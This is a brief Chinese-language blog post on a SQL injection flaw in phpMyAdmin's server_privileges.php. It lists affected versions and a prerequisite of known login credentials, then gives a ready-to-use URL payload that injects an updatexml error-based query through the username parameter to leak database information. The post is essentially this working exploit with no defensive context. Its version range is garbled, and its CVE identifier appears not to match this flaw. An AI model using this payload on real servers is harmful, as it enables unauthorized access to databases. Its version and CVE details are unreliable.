phpMyadmin SQL注入(CVE-2020-0554)

2020-03-07  本文已影响0人  7hang_

影响版本: 4<4.9.4 and 5>5.0.1

前提:已知phpMyadmin的一个用户口令

Payload:

/phpMyAdmin-4.9.2-all-languages/server_privileges.php?ajax_request=true&validate_username=true&username=test%27%20and%20(select%20updatexml(1,concat(0x7e,(SELECT%20user()),0x7e),1))%20--%20

上一篇下一篇

猜你喜欢

热点阅读